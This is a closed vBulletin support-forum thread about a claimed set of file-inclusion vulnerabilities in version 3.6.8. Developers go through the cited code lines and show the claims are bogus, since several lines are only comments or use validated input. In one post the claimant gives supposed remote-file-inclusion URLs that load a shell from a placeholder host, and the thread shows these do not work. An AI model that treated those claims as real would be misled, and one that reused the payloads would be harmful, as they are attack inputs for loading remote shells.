Announcement

Collapse
No announcement yet.

vBulletin Version 3.6.8 Vulnerabilities - Bogus

Collapse
This topic is closed.
X
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • vBulletin Version 3.6.8 Vulnerabilities - Bogus

    Hello,

    There are a number of gaps in Release 3.6.8 look for:

    in includes files in class_paid_subscription in line 621 , in functions in line 89
    , in functions_cron in line 276 , in functions_forumdisplay in line 59
    , in functions_misc in line 519 , in functions_ranks in line 22
    and
    in class_vurl in line 250 .

    and in install file

    tableprefix in line 41.

    and in admincp file
    in cronadmin in line 110 , in diagnostic in line 368 , in diagnostic in line 594
    and in plugin in line 721 and in line 831

    Good luck.
    Arab vBulletin Team

  • #2
    Ok, this is just ridiculous. Searching in files for the word "include" is not a vulnerability. 2 of the lines you pointed to are COMMENTS! You know, explanation of the code!

    Then you picked up a function definition, probably because it's a class method named "exec".

    People love to have their name in lights... But this is just plain stupidity. It's not the first time either -- go take a look at all the people we had to "smack down" on SecurityFocus.

    And on another note... responsible disclosure would mean these would be reported via the support system or in a private bug report. Please do this in the future.

    Comment


    • #3
      ok mike
      Give me an email

      I am not stupid
      I am GeNiUs HaCkEr
      Search at Google you will Founded me hare ok mike

      Comment


      • #4
        Ok if you want an explanation.

        includes/class_paid_subscriptions.php line 621
        PHP Code:
                if (file_exists(DIR '/includes/paymentapi/class_' $methodinfo['classname'] . '.php'))
                {
                    require_once(
        DIR '/includes/paymentapi/class_' $methodinfo['classname'] . '.php'); 
        First its in a class so calling it directly isn't possible but even if you could $methodinfo comes directly from a database row. So please tell me where the explois is here?

        --

        includes/functions.php line 81

        PHP Code:
            if (preg_match('#^\w+$#'$classtype))
            {
                
        $classtype strtolower($classtype);
                if (
        $forcefile)
                {
                    
        $classfile preg_replace('#[^a-z0-9_]#i'''$forcefile);
                }
                else
                {
                    
        $classfile str_replace('_multiple'''$classtype);
                }
                require_once(
        DIR '/includes/class_dm_' $classfile '.php'); 
        Do you see that $classfile gets changed to make sure it only contains a-z0-9- that doesn't include http:// so against no exploit here even if you could force a call.

        --

        includes/functions_cron.php line 276

        PHP Code:
                if ($nextrun build_cron_item($nextitem['cronid'], $nextitem))
                {
                    include_once(
        DIR '/' $nextitem['filename']);
                } 
        $nextitem is an array that comes directly from the database right above this call.

        --

        includes/functions_forumdisplay.php line 59

        PHP Code:
        // note: this function requires the use of $iconcache - include it in $specialtemplates! 
        This isn't even code its a comment that includes the word include.

        --

        includes/functions_misc.php line 519

        PHP Code:
            // include the $, but escape it in the key 
        Again its a comment not even executed code.

        --

        includes/functions_ranks.php line 22

        PHP Code:
        // grab ranks since we didn't include 'ranks' in $specialtemplates 
        Another comment

        --

        includes/class_vurl.php line 250

        PHP Code:
            function exec($followlocation false)
            {
                
        // ..
            

        Thats a function definition not a PHP call so there isn't one there.

        --

        install/tableprefix.php line 41

        PHP Code:
        require_once(DIR "/{$vbulletin->config['Misc']['admincpdir']}/global.php"); 
        DIR is a constant you can't change that and the other is from a config file loaded directly above.

        --

        admincp/cronadmin.php line 110

        PHP Code:
                require_once(DIR '/includes/functions_cron.php');
                include_once(
        DIR '/' $nextitem['filename']); 
        $nextitem against comes from a database row directly above.

        --

        admincp/diagnostic.php line 368 + line 594

        PHP Code:
                while ($file readdir($handle))
                {
                    if (
        preg_match('#^md5_sums_.+$#siU'$file$match))
                    {
                        unset(
        $md5_sum_softwareid);
                        include(
        DIR "/includes/$match[0]");
                    }
                } 
        Thats a shortened version but its loadig files from the file system that match a certain pattern.

        PHP Code:
                    require_once(DIR '/includes/paymentapi/class_' $api['classname'] . '.php'); 
        Again this is a database row loaded directly above.

        --

        admincp/plugin.php line 721 + line 831

        PHP Code:
                $safeid preg_replace('#[^a-z0-9_]#i'''$product['productid']);
                if (
        file_exists(DIR '/includes/version_' $safeid '.php'))
                {
                    include_once(
        DIR '/includes/version_' $safeid '.php');
                } 
        Comes from a database row bu we even validate it just to be sure, both lines you list are identical code.

        --

        Now as you can see thats why none of these are valid, and if you'd taken a few minutes to look at them before reporting you'd have seen that as well.

        Can you even explain how a comment ended up getting shown in your results?
        Scott MacVicar

        My Blog | Twitter

        Comment


        • #5
          ok man
          Last edited by Dr.ExPoLiT; Mon 6th Aug '07, 10:51am.

          Comment


          • #6
            Oy ve...
            Toddler from Hell

            Comment


            • #7
              Haha. Top thread. Please move it to Chit Chat.

              Comment


              • #8
                ok Scott i tell you exploits

                1st includes/class_paid_subscriptions.php line 621
                PHP Code:
                    if (file_exists(DIR '/includes/paymentapi/class_' $methodinfo['classname'] . '.php')) 
                        { 
                            require_once(
                DIR '/includes/paymentapi/class_' $methodinfo['classname'] . '.php'); 
                hacker can upload shell [evil code]
                from http://site/forum/includes/class_paid_subscriptions.php=http://shell?
                ----------
                2nd
                includes/functions.php line 81

                PHP Code:
                    if (preg_match('#^\w+$#'$classtype))
                    {
                        
                $classtype strtolower($classtype);
                        if (
                $forcefile)
                        {
                            
                $classfile preg_replace('#[^a-z0-9_]#i'''$forcefile);
                        }
                        else
                        {
                            
                $classfile str_replace('_multiple'''$classtype);
                        }
                        require_once(
                DIR '/includes/class_dm_' $classfile '.php'); 
                http://site/forum/includes/functions.php?classfile=http://shell?
                ---------
                3nd
                includes/functions_cron.php line 276
                PHP Code:
                         if ($nextrun build_cron_item($nextitem['cronid'], $nextitem))
                        {
                            include_once(
                DIR '/' $nextitem['filename']); 
                        } 
                http://site/forum/includes/functions_cron.php?nextrun=http://shell?
                -------

                Is this sufficient or not

                If you side net send message and tell me what you now ok Scott MacVicar

                Next time I will be gaps in SecurityFocus

                good Luck.

                Comment


                • #9
                  As Scott said above, all these variables are checked or set previously in the code.
                  Best Regards
                  Colin Frei

                  Please don't contact me per PM.

                  Comment


                  • #10
                    How dare anyone question Dr.ExPoLiT, he's teh 1337!

                    Seriously, if you think you've found an issue, the bug tracker is where it should be posted.
                    Call no man happy until he is dead - Voltaire

                    Comment


                    • #11
                      Originally posted by Dr.ExPoLiT View Post
                      ok Scott i tell you exploits
                      ...
                      So, you are patching your own forum when you find these exploits of course, right?

                      Where are you getting these php files from, because the devs patch any holes found within a day or so.

                      Comment


                      • #12
                        Rofl @ this thread

                        Comment


                        • #13
                          Are you saying that DIR can be changed? That is a constant that is set in the vB code somewhere with the full path to the forum. That cannot be exploited...
                          <Onimua> Congrats Chroder
                          <Onimua> You're a daddy.
                          <Chroder> eh
                          <Onimua> :)
                          <Chroder> uh oh

                          Comment


                          • #14
                            Originally posted by aranthorn View Post
                            How dare anyone question Dr.ExPoLiT, he's teh 1337!
                            I dare what he posts is just rubbisch .... Scott already explained him there are no holes still he .... and everybody not even somebody who has no idea what PHP code is knows a comment is ignored by the PHP parser.Also you don't have to be verry smart to open a PHP file and search for the word "include" and think it's a hole.... (as Mike already mentioned)

                            vBulletin has much work explaining all the wannabees on SecurityFocus that they are wrong i'm subscrided to that list so i know ....

                            Comment


                            • #15
                              I think you missed the sarcasm.

                              Comment

                              Related Topics

                              Collapse

                              Working...
                              X